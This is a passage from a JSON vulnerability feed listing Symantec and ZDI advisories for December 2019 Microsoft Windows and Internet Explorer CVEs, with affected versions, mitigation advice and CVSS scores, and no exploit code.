Hyper-V \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows Hyper-V CVE-2019-1470 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1470"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111051", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111051", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for 32-bit Systems \n * Microsoft Windows 10 Version 1909 for ARM64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows GDI Component CVE-2019-1465 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1465"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111047", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111047", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for 32-bit Systems \n * Microsoft Windows 10 Version 1909 for ARM64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows GDI Component CVE-2019-1466 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1466"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111048", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111048", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause a denial-of-service condition.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for 32-bit Systems \n * Microsoft Windows 10 Version 1909 for ARM64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows Win32k Graphics CVE-2019-1468 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1468"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111062", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111062", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for 32-bit Systems \n * Microsoft Windows 10 Version 1909 for ARM64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows OLE CVE-2019-1484 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1484"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111056", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111056", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:04:29", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the current user. Failed exploit attempts may result in a denial of service condition. Internet explorer 9, 10 and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful attacks, never handle or open files from unknown sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of successful exploits, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code. Host-based intrusion-prevention systems may also help prevent exploits. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer VBScript Engine CVE-2019-1485 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1485"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111074", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111074", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:02", "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for 32-bit Systems \n * Microsoft Windows 10 Version 1909 for ARM64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows Win32k CVE-2019-1469 Local Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1469"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111064", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111064", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to gain elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for 32-bit Systems \n * Microsoft Windows 10 Version 1909 for ARM64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows CVE-2019-1476 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1476"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111076", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111076", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Defender is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for 32-bit Systems \n * Microsoft Windows 10 Version 1909 for ARM64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the consequences of a successful exploit, run server processes within a restricted environment using facilities such as chroot or jail. \n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Defender CVE-2019-1488 Security Bypass Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1488"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111129", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111129", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. A local attacker can leverage this issue to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for 32-bit Systems \n * Microsoft Windows 10 Version 1909 for ARM64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2019-1472 Local Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1472"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111066", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111066", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdi": [{"lastseen": "2023-06-13T15:49:02", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the font subsetting library. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-11T00:00:00", "type": "zdi", "title": "Microsoft Windows Font Subsetting Library Out-Of-Bounds Write Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1468"], "modified": "2019-12-11T00:00:00", "id": "ZDI-19-1004", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-1004/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T15:49:00", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-12-11T00:00:00", "type": "zdi", "title": "Microsoft Windows EMF Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 